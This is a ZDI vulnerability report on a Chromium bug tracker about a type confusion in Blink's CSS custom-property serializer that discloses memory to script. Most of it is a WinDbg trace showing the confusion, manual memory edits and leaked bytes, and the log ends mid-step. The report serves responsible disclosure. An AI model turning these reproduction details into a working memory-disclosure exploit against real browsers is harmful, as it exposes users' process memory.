Issue metadata
Sign in to add a comment
|
Security: Type confusion in StylePropertySerializer::getCustomPropertyText.
Reported by
zdi-disc...@hp.com,
Jun 22 2016
|
||||||||||||||||||||||
Issue descriptionZDI-CAN-3840: Google Chrome StylePropertySerializer Type Confusion Information Disclosure Vulnerability -- CVSS ----------------------------------------- 4.3, AV:N/AC:M/Au:N/C:P/I:N/A:N -- ABSTRACT ------------------------------------- Trend Micro's Zero Day Initiative has identified a vulnerability affecting the following products: Google Chrome -- VULNERABILITY DETAILS ------------------------ * Version tested: Chromium for Windows 64-bit (commit 42b7246433e2b79901292d2bc97dc6607530fac2) * Platform tested: Windows 10 Enterprise 1511 64-bit Type confusion in StylePropertySerializer::getCustomPropertyText. StylePropertySerializer::getCustomPropertyText has pointer to a CSSVariableReferenceValue and improperly casts it to `CSSCustomPropertyDeclaration*`. Consequentially CSSCustomPropertyDeclaration.name takes a pointer to a CSSVariableData object and uses it as an `AtomicString*`. The end result is that some memory contents are disclosed to the calling script. Some memory preparation is needed to ensure that only valid memory is read so that the process does not crash, but this appears quite feasible. Running the attached PoC on either the Debug or Release build of Chromium without a debugger attached results in an "Aw Snap". Debug log (from release build) ``` ************* Symbol Path validation summary ************** Response Time (ms) Location Deferred symsrv*symsrv.dll*c:\symbols*http://msdl.microsoft.com/download/symbols ************* Symbol Path validation summary ************** Response Time (ms) Location OK C:\chromium\src OK C:\chromium\src\third_party\WebKit\Source\core\css\parser OK C:\chromium\src\third_party\WebKit\Source\core\css Microsoft (R) Windows Debugger Version 10.0.10586.567 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. *** wait with pending attach ************* Symbol Path validation summary ************** Response Time (ms) Location Deferred symsrv*symsrv.dll*c:\symbols*http://msdl.microsoft.com/download/symbols Symbol search path is: symsrv*symsrv.dll*c:\symbols*http://msdl.microsoft.com/download/symbols Executable search path is: ModLoad: 00007ff6`a29a0000 00007ff6`a37a6000 C:\chromium\src\out\Release1\chrome.exe ModLoad: 00007ffe`0b350000 00007ffe`0b511000 C:\Windows\SYSTEM32\ntdll.dll ModLoad: 00007ffe`08a20000 00007ffe`08acd000 C:\Windows\system32\KERNEL32.DLL ModLoad: 00007ffe`08430000 00007ffe`08618000 C:\Windows\system32\KERNELBASE.dll ModLoad: 00007ffe`0b020000 00007ffe`0b0c7000 C:\Windows\system32\ADVAPI32.dll ModLoad: 00007ffe`0a0d0000 00007ffe`0a16d000 C:\Windows\system32\msvcrt.dll ModLoad: 00007ffe`0a3b0000 00007ffe`0a40b000 C:\Windows\system32\sechost.dll ModLoad: 00007ffe`08900000 00007ffe`08a1c000 C:\Windows\system32\RPCRT4.dll ModLoad: 00007ffe`0a220000 00007ffe`0a3a6000 C:\Windows\system32\GDI32.dll ModLoad: 00007ffe`0a8a0000 00007ffe`0a9f6000 C:\Windows\system32\USER32.dll ModLoad: 00007ffe`0a890000 00007ffe`0a898000 C:\Windows\system32\PSAPI.DLL ModLoad: 00007ffe`08ad0000 00007ffe`0a02c000 C:\Windows\system32\SHELL32.dll ModLoad: 00007ffe`08350000 00007ffe`08393000 C:\Windows\system32\cfgmgr32.dll ModLoad: 00007ffe`07d00000 00007ffe`08344000 C:\Windows\system32\windows.storage.dll ModLoad: 00007ffe`0a5e0000 00007ffe`0a85d000 C:\Windows\system32\combase.dll ModLoad: 00007ffe`08620000 00007ffe`0868a000 C:\Windows\system32\bcryptPrimitives.dll ModLoad: 00007ffe`0a030000 00007ffe`0a082000 C:\Windows\system32\shlwapi.dll ModLoad: 00007ffe`07980000 00007ffe`0798f000 C:\Windows\system32\kernel.appcore.dll ModLoad: 00007ffe`08690000 00007ffe`08745000 C:\Windows\system32\shcore.dll ModLoad: 00007ffe`07990000 00007ffe`079db000 C:\Windows\system32\powrprof.dll ModLoad: 00007ffe`079e0000 00007ffe`079f4000 C:\Windows\system32\profapi.dll ModLoad: 00007ffe`0afb0000 00007ffe`0b01b000 C:\Windows\system32\WS2_32.dll ModLoad: 00007ffe`07b10000 00007ffe`07b27000 C:\Windows\system32\NETAPI32.dll ModLoad: 00007ffe`07b30000 00007ffe`07cf8000 C:\Windows\system32\CRYPT32.dll ModLoad: 00007ffe`07970000 00007ffe`07980000 C:\Windows\system32\MSASN1.dll ModLoad: 00007ffd`f9870000 00007ffd`f9927000 C:\chromium\src\out\Release1\chrome_elf.dll ModLoad: 00007ffe`04a70000 00007ffe`04a88000 C:\Windows\SYSTEM32\USP10.dll ModLoad: 00007ffd`fec20000 00007ffd`fec2a000 C:\Windows\SYSTEM32\VERSION.dll ModLoad: 00007ffd`f9cb0000 00007ffd`f9f59000 C:\Windows\SYSTEM32\WININET.dll ModLoad: 00007ffe`06070000 00007ffe`06093000 C:\Windows\SYSTEM32\WINMM.dll ModLoad: 00007ffe`070d0000 00007ffe`070ef000 C:\Windows\SYSTEM32\USERENV.dll ModLoad: 00007ffe`057e0000 00007ffe`057f3000 C:\Windows\SYSTEM32\WTSAPI32.dll ModLoad: 00007ffd`fbb00000 00007ffd`fbcb7000 C:\Windows\SYSTEM32\urlmon.dll ModLoad: 00007ffe`040b0000 00007ffe`04178000 C:\Windows\SYSTEM32\WINHTTP.dll ModLoad: 00007ffe`01bf0000 00007ffe`01c0a000 C:\Windows\SYSTEM32\dhcpcsvc.DLL ModLoad: 00007ffe`0a880000 00007ffe`0a888000 C:\Windows\system32\NSI.dll ModLoad: 00007ffe`04250000 00007ffe`04288000 C:\Windows\SYSTEM32\IPHLPAPI.DLL ModLoad: 00007ffe`040a0000 00007ffe`040ac000 C:\Windows\SYSTEM32\Secur32.dll ModLoad: 00007ffe`06010000 00007ffe`0603c000 C:\Windows\SYSTEM32\WINMMBASE.dll ModLoad: 00007ffd`ff3c0000 00007ffd`ff743000 C:\Windows\SYSTEM32\iertutil.dll ModLoad: 00007ffe`07890000 00007ffe`0789b000 C:\Windows\SYSTEM32\CRYPTBASE.DLL ModLoad: 00007ffe`06d80000 00007ffe`06d8c000 C:\Windows\SYSTEM32\NETUTILS.DLL ModLoad: 00007ffe`03710000 00007ffe`03726000 C:\Windows\SYSTEM32\WKSCLI.DLL ModLoad: 00007ffe`078a0000 00007ffe`078c9000 C:\Windows\SYSTEM32\bcrypt.dll ModLoad: 00007ffe`075e0000 00007ffe`0760d000 C:\Windows\SYSTEM32\SSPICLI.DLL ModLoad: 00007ffe`0a090000 00007ffe`0a0cb000 C:\Windows\system32\IMM32.DLL ModLoad: 00007ffd`e12e0000 00007ffd`e62ad000 C:\chromium\src\out\Release1\chrome_child.dll ModLoad: 00007ffe`0aa00000 00007ffe`0ab0b000 C:\Windows\system32\COMDLG32.dll ModLoad: 00007ffe`083a0000 00007ffe`08426000 C:\Windows\system32\FirewallAPI.dll ModLoad: 00007ffe`08750000 00007ffe`08893000 C:\Windows\system32\ole32.dll ModLoad: 00007ffe`0b280000 00007ffe`0b341000 C:\Windows\system32\OLEAUT32.dll ModLoad: 00007ffe`07a00000 00007ffe`07a55000 C:\Windows\system32\WINTRUST.dll ModLoad: 00007ffd`f9020000 00007ffd`f9294000 C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\COMCTL32.dll ModLoad: 00007ffe`02cf0000 00007ffe`02d74000 C:\Windows\SYSTEM32\WINSPOOL.DRV ModLoad: 00007ffd`f8970000 00007ffd`f89da000 C:\Windows\SYSTEM32\OLEACC.dll ModLoad: 00007ffe`01460000 00007ffe`01488000 C:\Windows\SYSTEM32\NTDSAPI.dll ModLoad: 00007ffe`03b80000 00007ffe`03d0c000 C:\Windows\SYSTEM32\dbghelp.dll ModLoad: 00007ffd`f87b0000 00007ffd`f87bc000 C:\Windows\SYSTEM32\DAVHLPR.DLL ModLoad: 00007ffe`066f0000 00007ffe`06722000 C:\Windows\system32\fwbase.dll ModLoad: 00007ffd`fdae0000 00007ffd`fdd40000 C:\Windows\SYSTEM32\dwrite.dll (d78.6f4): Break instruction exception - code 80000003 (first chance) ntdll!DbgBreakPoint: 00007ffe`0b3f8870 cc int 3 0:009> bp @@masm(`chrome_child!CSSPropertyParser.cpp:172+`) 4; *** WARNING: Unable to verify checksum for C:\chromium\src\out\Release1\chrome_child.dll 0:009> bp @@masm(`chrome_child!StylePropertySerializer.cpp:184+`); 0:009> g Breakpoint 0 hit chrome_child!blink::CSSPropertyParser::parseValueStart+0x57: 00007ffd`e3b20b8f 803d86951c0200 cmp byte ptr [chrome_child!blink::RuntimeEnabledFeatures::isCSSVariablesEnabled (00007ffd`e5cea11c)],0 ds:00007ffd`e5cea11c=01 0:000> k # Child-SP RetAddr Call Site 00 00000012`f836aca0 00007ffd`e3b20b18 chrome_child!blink::CSSPropertyParser::parseValueStart+0x57 [c:\chromium\src\third_party\webkit\source\core\css\parser\csspropertyparser.cpp @ 173] 01 00000012`f836ad00 00007ffd`e3b0bc10 chrome_child!blink::CSSPropertyParser::parseValue+0xf0 [c:\chromium\src\third_party\webkit\source\core\css\parser\csspropertyparser.cpp @ 121] 02 00000012`f836ad60 00007ffd`e3b0edbd chrome_child!blink::CSSParserImpl::consumeDeclarationValue+0x2c [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparserimpl.cpp @ 804] 03 00000012`f836ada0 00007ffd`e3b075f8 chrome_child!blink::CSSParserImpl::parseValue+0xb1 [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparserimpl.cpp @ 50] 04 (Inline Function) --------`-------- chrome_child!blink::CSSParser::parseValue+0x1a [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparser.cpp @ 99] 05 00000012`f836be80 00007ffd`e3b532e4 chrome_child!blink::CSSParser::parseValue+0xd8 [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparser.cpp @ 75] 06 00000012`f836bf80 00007ffd`e3b52f6c chrome_child!blink::EditingStyle::mergeStyle+0x368 [c:\chromium\src\third_party\webkit\source\core\editing\editingstyle.cpp @ 1184] 07 00000012`f836c010 00007ffd`e3b85358 chrome_child!blink::EditingStyle::mergeInlineStyleOfElement+0x88 [c:\chromium\src\third_party\webkit\source\core\editing\editingstyle.cpp @ 1058] 08 00000012`f836c040 00007ffd`e3b8807c chrome_child!blink::ApplyStyleCommand::applyInlineStyleToPushDown+0xc0 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1119] 09 00000012`f836c0a0 00007ffd`e3b840b0 chrome_child!blink::ApplyStyleCommand::removeInlineStyle+0x350 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1283] 0a 00000012`f836c2a0 00007ffd`e3b85e8b chrome_child!blink::ApplyStyleCommand::applyInlineStyle+0x3cc [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 681] 0b 00000012`f836c3d0 00007ffd`e3b8a47c chrome_child!blink::ApplyStyleCommand::doApply+0xb7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 236] 0c 00000012`f836c400 00007ffd`e3b9d51b chrome_child!blink::CompositeEditCommand::applyCommandToComposite+0x34 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 255] 0d 00000012`f836c430 00007ffd`e3b8a345 chrome_child!blink::RemoveFormatCommand::doApply+0xd7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\removeformatcommand.cpp @ 97] 0e 00000012`f836c470 00007ffd`e3b5e066 chrome_child!blink::CompositeEditCommand::apply+0x89 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 209] 0f 00000012`f836c4a0 00007ffd`e3b951ec chrome_child!blink::Editor::removeFormattingAndStyle+0x42 [c:\chromium\src\third_party\webkit\source\core\editing\editor.cpp @ 579] 10 00000012`f836c4d0 00007ffd`e3b932b9 chrome_child!blink::executeRemoveFormat+0x10 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1104] 11 00000012`f836c500 00007ffd`e38c07c2 chrome_child!blink::Editor::Command::execute+0x189 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1811] 12 00000012`f836c550 00007ffd`e37b8766 chrome_child!blink::Document::execCommand+0x18a [c:\chromium\src\third_party\webkit\source\core\dom\document.cpp @ 4468] 13 00000012`f836c5b0 00007ffd`e24a7041 chrome_child!blink::DocumentV8Internal::execCommandMethod+0x2da [c:\chromium\src\out\release1\gen\blink\bindings\core\v8\v8document.cpp @ 4162] 14 00000012`f836c690 00007ffd`e252937b chrome_child!v8::internal::FunctionCallbackArguments::Call+0x151 [c:\chromium\src\v8\src\api-arguments.cc @ 20] 15 00000012`f836c760 00007ffd`e2512e82 chrome_child!v8::internal::`anonymous namespace'::HandleApiCallHelper+0x4cb [c:\chromium\src\v8\src\builtins.cc @ 4961] 16 00000012`f836c890 00007ffd`e25067ab chrome_child!v8::internal::Builtin_Impl_HandleApiCall+0x42 [c:\chromium\src\v8\src\builtins.cc @ 4977] 17 00000012`f836c8d0 00000378`41b063cb chrome_child!v8::internal::Builtin_HandleApiCall+0x3b [c:\chromium\src\v8\src\builtins.cc @ 4975] 18 00000012`f836c910 00000012`f836c968 0x00000378`41b063cb 19 00000012`f836c918 00000378`41b063cb 0x00000012`f836c968 1a 00000012`f836c920 00007ffd`e27c292f 0x00000378`41b063cb 1b 00000012`f836c928 00000378`41b70aa9 chrome_child!v8::internal::Runtime_LoadElementWithInterceptor+0x22f 1c 00000012`f836c930 000002cc`16b176e9 0x00000378`41b70aa9 1d 00000012`f836c938 000001cf`740eead0 0x000002cc`16b176e9 1e 00000012`f836c940 00000378`41b06301 0x000001cf`740eead0 1f 00000012`f836c948 00000012`f836c910 0x00000378`41b06301 20 00000012`f836c950 00000003`00000000 0x00000012`f836c910 21 00000012`f836c958 00000012`f836c9b8 0x00000003`00000000 22 00000012`f836c960 00000378`41b70ae9 0x00000012`f836c9b8 23 00000012`f836c968 000000e9`fd704311 0x00000378`41b70ae9 24 00000012`f836c970 000002dd`665185c9 0x000000e9`fd704311 25 00000012`f836c978 000000e9`fd704411 0x000002dd`665185c9 26 00000012`f836c980 000000e9`fd704411 0x000000e9`fd704411 27 00000012`f836c988 000002dd`66550321 0x000000e9`fd704411 28 00000012`f836c990 00000182`aa205af9 0x000002dd`66550321 29 00000012`f836c998 000002dd`665185c9 0x00000182`aa205af9 2a 00000012`f836c9a0 000000e9`fd704311 0x000002dd`665185c9 2b 00000012`f836c9a8 000002dd`665506b9 0x000000e9`fd704311 2c 00000012`f836c9b0 000000e9`fd7ba631 0x000002dd`665506b9 2d 00000012`f836c9b8 00000012`f836c9e8 0x000000e9`fd7ba631 2e 00000012`f836c9c0 00000378`41b42b64 0x00000012`f836c9e8 2f 00000012`f836c9c8 00000182`aa205b49 0x00000378`41b42b64 30 00000012`f836c9d0 000002dd`665506b9 0x00000182`aa205b49 31 00000012`f836c9d8 00000378`41b42a81 0x000002dd`665506b9 32 00000012`f836c9e0 0000000c`00000000 0x00000378`41b42a81 33 00000012`f836c9e8 00000012`f836cb00 0x0000000c`00000000 34 00000012`f836c9f0 00000378`41b27003 0x00000012`f836cb00 35 00000012`f836c9f8 00000000`00000000 0x00000378`41b27003 0:000> tct chrome_child!blink::CSSPropertyParser::parseValueStart+0x74: 00007ffd`e3b20bac e8af7b0000 call chrome_child!blink::CSSVariableParser::containsValidVariableReferences (00007ffd`e3b28760) 0:000> p chrome_child!blink::CSSPropertyParser::parseValueStart+0x79: 00007ffd`e3b20bb1 84c0 test al,al 0:000> tct chrome_child!blink::CSSVariableData::operator new+0xc [inlined in chrome_child!blink::CSSPropertyParser::parseValueStart+0x89]: 00007ffd`e3b20bc1 e8c6bd6dfe call chrome_child!WTF::Partitions::fastMalloc (00007ffd`e21fc98c) 0:000> r rax=0000000000000201 rbx=00000012f836ad20 rcx=0000000000000038 rdx=00007ffde5770480 rsi=0000000000000002 rdi=0000000000000002 rip=00007ffde3b20bc1 rsp=00000012f836aca0 rbp=00000012f836ae00 r8=00007ffde5e94888 r9=00000012f836aa01 r10=00007ffde56dc650 r11=0000000000000001 r12=0000000000000001 r13=00000350846c92a0 r14=00000012f836ae18 r15=0000000000000000 iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 chrome_child!blink::CSSVariableData::operator new+0xc [inlined in chrome_child!blink::CSSPropertyParser::parseValueStart+0x89]: 00007ffd`e3b20bc1 e8c6bd6dfe call chrome_child!WTF::Partitions::fastMalloc (00007ffd`e21fc98c) 0:000> p chrome_child!blink::CSSVariableData::create+0x11 [inlined in chrome_child!blink::CSSPropertyParser::parseValueStart+0x8e]: 00007ffd`e3b20bc6 4885c0 test rax,rax 0:000> ?@rax Evaluate expression: 2472915841448 = 0000023f`c54531a8 0:000> ed @rax+4 20 0:000> g Breakpoint 1 hit chrome_child!WTF::RefPtr<WTF::StringImpl>::get [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52]: 00007ffd`e3af62be 488b4b08 mov rcx,qword ptr [rbx+8] ds:000003f6`9bc83a80=0000023fc54531a8 0:000> k # Child-SP RetAddr Call Site 00 (Inline Function) --------`-------- chrome_child!WTF::RefPtr<WTF::StringImpl>::get 01 (Inline Function) --------`-------- chrome_child!WTF::String::impl 02 (Inline Function) --------`-------- chrome_child!WTF::AtomicString::impl 03 (Inline Function) --------`-------- chrome_child!WTF::StringView::{ctor} 04 00000012`f836bd60 00007ffd`e3af4b8f chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52 [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyserializer.cpp @ 184] 05 00000012`f836bde0 00007ffd`e3af882f chrome_child!blink::StylePropertySerializer::asText+0x49b [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyserializer.cpp @ 241] 06 00000012`f836bfb0 00007ffd`e3b853a6 chrome_child!blink::StylePropertySet::asText+0x33 [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyset.cpp @ 379] 07 00000012`f836c040 00007ffd`e3b8807c chrome_child!blink::ApplyStyleCommand::applyInlineStyleToPushDown+0x10e [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1120] 08 00000012`f836c0a0 00007ffd`e3b840b0 chrome_child!blink::ApplyStyleCommand::removeInlineStyle+0x350 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1283] 09 00000012`f836c2a0 00007ffd`e3b85e8b chrome_child!blink::ApplyStyleCommand::applyInlineStyle+0x3cc [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 681] 0a 00000012`f836c3d0 00007ffd`e3b8a47c chrome_child!blink::ApplyStyleCommand::doApply+0xb7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 236] 0b 00000012`f836c400 00007ffd`e3b9d51b chrome_child!blink::CompositeEditCommand::applyCommandToComposite+0x34 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 255] 0c 00000012`f836c430 00007ffd`e3b8a345 chrome_child!blink::RemoveFormatCommand::doApply+0xd7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\removeformatcommand.cpp @ 97] 0d 00000012`f836c470 00007ffd`e3b5e066 chrome_child!blink::CompositeEditCommand::apply+0x89 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 209] 0e 00000012`f836c4a0 00007ffd`e3b951ec chrome_child!blink::Editor::removeFormattingAndStyle+0x42 [c:\chromium\src\third_party\webkit\source\core\editing\editor.cpp @ 579] 0f 00000012`f836c4d0 00007ffd`e3b932b9 chrome_child!blink::executeRemoveFormat+0x10 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1104] 10 00000012`f836c500 00007ffd`e38c07c2 chrome_child!blink::Editor::Command::execute+0x189 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1811] 11 00000012`f836c550 00007ffd`e37b8766 chrome_child!blink::Document::execCommand+0x18a [c:\chromium\src\third_party\webkit\source\core\dom\document.cpp @ 4468] 12 00000012`f836c5b0 00007ffd`e24a7041 chrome_child!blink::DocumentV8Internal::execCommandMethod+0x2da [c:\chromium\src\out\release1\gen\blink\bindings\core\v8\v8document.cpp @ 4162] 13 00000012`f836c690 00007ffd`e252937b chrome_child!v8::internal::FunctionCallbackArguments::Call+0x151 [c:\chromium\src\v8\src\api-arguments.cc @ 20] 14 00000012`f836c760 00007ffd`e2512e82 chrome_child!v8::internal::`anonymous namespace'::HandleApiCallHelper+0x4cb [c:\chromium\src\v8\src\builtins.cc @ 4961] 15 00000012`f836c890 00007ffd`e25067ab chrome_child!v8::internal::Builtin_Impl_HandleApiCall+0x42 [c:\chromium\src\v8\src\builtins.cc @ 4977] 16 00000012`f836c8d0 00000378`41b063cb chrome_child!v8::internal::Builtin_HandleApiCall+0x3b [c:\chromium\src\v8\src\builtins.cc @ 4975] 17 00000012`f836c910 00000012`f836c968 0x00000378`41b063cb 18 00000012`f836c918 00000378`41b063cb 0x00000012`f836c968 19 00000012`f836c920 00007ffd`e27c292f 0x00000378`41b063cb 1a 00000012`f836c928 00000378`41b70aa9 chrome_child!v8::internal::Runtime_LoadElementWithInterceptor+0x22f 1b 00000012`f836c930 000002cc`16b176e9 0x00000378`41b70aa9 1c 00000012`f836c938 000001cf`740eead0 0x000002cc`16b176e9 1d 00000012`f836c940 00000378`41b06301 0x000001cf`740eead0 1e 00000012`f836c948 00000012`f836c910 0x00000378`41b06301 1f 00000012`f836c950 00000003`00000000 0x00000012`f836c910 20 00000012`f836c958 00000012`f836c9b8 0x00000003`00000000 21 00000012`f836c960 00000378`41b70ae9 0x00000012`f836c9b8 22 00000012`f836c968 000000e9`fd704311 0x00000378`41b70ae9 23 00000012`f836c970 000002dd`665185c9 0x000000e9`fd704311 24 00000012`f836c978 000000e9`fd704411 0x000002dd`665185c9 25 00000012`f836c980 000000e9`fd704411 0x000000e9`fd704411 26 00000012`f836c988 000002dd`66550321 0x000000e9`fd704411 27 00000012`f836c990 00000182`aa205af9 0x000002dd`66550321 28 00000012`f836c998 000002dd`665185c9 0x00000182`aa205af9 29 00000012`f836c9a0 000000e9`fd704311 0x000002dd`665185c9 2a 00000012`f836c9a8 000002dd`665506b9 0x000000e9`fd704311 2b 00000012`f836c9b0 000000e9`fd7ba631 0x000002dd`665506b9 2c 00000012`f836c9b8 00000012`f836c9e8 0x000000e9`fd7ba631 2d 00000012`f836c9c0 00000378`41b42b64 0x00000012`f836c9e8 2e 00000012`f836c9c8 00000182`aa205b49 0x00000378`41b42b64 2f 00000012`f836c9d0 000002dd`665506b9 0x00000182`aa205b49 30 00000012`f836c9d8 00000378`41b42a81 0x000002dd`665506b9 31 00000012`f836c9e0 0000000c`00000000 0x00000378`41b42a81 32 00000012`f836c9e8 00000012`f836cb00 0x0000000c`00000000 33 00000012`f836c9f0 00000378`41b27003 0x00000012`f836cb00 34 00000012`f836c9f8 00000000`00000000 0x00000378`41b27003 0:000> ba r 1 0000023f`c54531a8+c 0:000> gu chrome_child!WTF::StringView::{ctor} [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x56]: 00007ffd`e3af62c2 4885c9 test rcx,rcx 0:000> gu chrome_child!WTF::StringView::{ctor}+0x3 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x59]: 00007ffd`e3af62c5 7512 jne chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x6d (00007ffd`e3af62d9) [br=1] 0:000> gu chrome_child!WTF::StringView::{ctor}+0x17 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x6d]: 00007ffd`e3af62d9 8b4104 mov eax,dword ptr [rcx+4] ds:0000023f`c54531ac=00000020 0:000> gu chrome_child!WTF::StringView::{ctor}+0x1a [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x70]: 00007ffd`e3af62dc 8945d0 mov dword ptr [rbp-30h],eax ss:00000012`f836bd90=956c66b0 0:000> gu chrome_child!WTF::StringImpl::bytes [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x73]: 00007ffd`e3af62df 488d410c lea rax,[rcx+0Ch] 0:000> gu chrome_child!WTF::StringImpl::bytes+0x4 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x77]: 00007ffd`e3af62e3 488945c8 mov qword ptr [rbp-38h],rax ss:00000012`f836bd88=00007ffde3af36a7 0:000> gu chrome_child!WTF::StringView::{ctor}+0x25 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x7b]: 00007ffd`e3af62e7 48894dc0 mov qword ptr [rbp-40h],rcx ss:00000012`f836bd80=0000000000000001 0:000> gu chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x7f: 00007ffd`e3af62eb 488d55c0 lea rdx,[rbp-40h] 0:000> gu Breakpoint 2 hit chrome_child!MoveSmall+0x20d: 00007ffd`e4e7a9e4 4883c110 add rcx,10h 0:000> ub . chrome_child!MoveSmall+0x1f0 [f:\dd\vctools\crt\vcruntime\src\string\amd64\memcpy.asm @ 424]: 00007ffd`e4e7a9c7 0f10440ae0 movups xmm0,xmmword ptr [rdx+rcx-20h] 00007ffd`e4e7a9cc 0f104c0af0 movups xmm1,xmmword ptr [rdx+rcx-10h] 00007ffd`e4e7a9d1 75ad jne chrome_child!MoveSmall+0x1a9 (00007ffd`e4e7a980) 00007ffd`e4e7a9d3 0f2941e0 movaps xmmword ptr [rcx-20h],xmm0 00007ffd`e4e7a9d7 4983e07f and r8,7Fh 00007ffd`e4e7a9db 0f28c1 movaps xmm0,xmm1 00007ffd`e4e7a9de eb0c jmp chrome_child!MoveSmall+0x215 (00007ffd`e4e7a9ec) 00007ffd`e4e7a9e0 0f10040a movups xmm0,xmmword ptr [rdx+rcx] 0:000> bl 0 e 00007ffd`e3b20b8f 0001 (0004) 0:**** chrome_child!blink::CSSPropertyParser::parseValueStart+0x57 1 e 00007ffd`e3af62be 0001 (0001) 0:**** chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52 2 e 0000023f`c54531b4 r 1 0001 (0001) 0:**** 0:000> dq 0000023f`c54531b4 0000023f`c54531b4 9c00e500`000004f2 00000004`000004f2 0000023f`c54531c4 00000001`00000003 00000000`00000000 0000023f`c54531d4 00000000`00000000 3f020000`00000000 0000023f`c54531e4 00000000`183245c5 00000000`00000000 0000023f`c54531f4 00000000`00000000 00000000`00000000 0000023f`c5453204 00000000`00000000 00000000`00000000 0000023f`c5453214 3f020000`00000000 00000000`503245c5 0000023f`c5453224 00000000`00000000 00000000`00000000 0:000> t chrome_child!MoveSmall+0x211: 00007ffd`e4e7a9e8 4983e810 sub r8,10h 0:000> t chrome_child!MoveSmall+0x215: 00007ffd`e4e7a9ec 4d8bc8 mov r9,r8 0:000> t chrome_child!MoveSmall+0x218: 00007ffd`e4e7a9ef 49c1e904 shr r9,4 0:000> t chrome_child!MoveSmall+0x21c: 00007ffd`e4e7a9f3 741c je chrome_child!MoveSmall+0x23a (00007ffd`e4e7aa11) [br=0] 0:000> t chrome_child!MoveSmall+0x21e: 00007ffd`e4e7a9f5 6666660f1f840000000000 nop word ptr [rax+rax] 0:000> t chrome_child!MoveSmall+0x229: 00007ffd`e4e7aa00 0f1141f0 movups xmmword ptr [rcx-10h],xmm0 ds:000004f2`9c0780fe=00000000000000000000000000000000 0:000> dq 000004f2`9c0780fe 000004f2`9c0780fe 00000000`00000000 00000000`00000000 000004f2`9c07810e 00000000`00000000 00000000`00000000 000004f2`9c07811e 00000000`00000000 00000000`00000000 000004f2`9c07812e 00000000`00000000 00000000`00000000 000004f2`9c07813e 00000000`00150000 00000000`00004100 000004f2`9c07814e 00000001`00138000 00000000`00004100 000004f2`9c07815e 00000002`00148000 00000000`00004100 000004f2`9c07816e 00000003`00198000 00000000`00004100 0:000> gu chrome_child!WTF::StringBuilder::append+0x13e: 00007ffd`e220adae 44897318 mov dword ptr [rbx+18h],r14d ds:00000012`f836bdb0=00000001 0:000> dq 000004f2`9c0780fe 000004f2`9c0780fe 9c00e500`000004f2 00000004`000004f2 000004f2`9c07810e 00000001`00000003 00000000`00000000 000004f2`9c07811e 00000000`00000000 3f020000`00000000 000004f2`9c07812e 00000000`183245c5 00000000`00000000 000004f2`9c07813e 00000000`00150000 00000000`00004100 000004f2`9c07814e 00000001`00138000 00000000`00004100 000004f2`9c07815e 00000002`00148000 00000000`00004100 000004f2`9c07816e 00000003`00198000 00000000`00004100 0:000> eu 000004f2`9c0780fe+10 "PWNED" 0:000> bp chrome_child!blink::ChromeClient::openJavaScriptAlert 0:000> gu chrome_child!WTF::StringBuilder::append+0x96: 00007ffd`e21fcb2a 488b5c2430 mov rbx,qword ptr [rsp+30h] ss:00000012`f836bd60=000003f69bc83a78 0:000> gu could step in/over inline function frames ... 03 00000012`f836bd60 00007ffd`e3af4b8f chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x8c [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyserializer.cpp @ 185] chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x8c: 00007ffd`e3af62f8 488b4de0 mov rcx,qword ptr [rbp-20h] ss:00000012`f836bda0=000004f29c0780f0 0:000> t chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x90: 00007ffd`e3af62fc ba3a000000 mov edx,3Ah 0:000> t chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x95: 00007ffd`e3af6301 885538 mov byte ptr [rbp+38h],dl ss:00000012`f836bdf8=20 0:000> t chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x98: 00007ffd`e3af6304 4885c9 test rcx,rcx 0:000> t 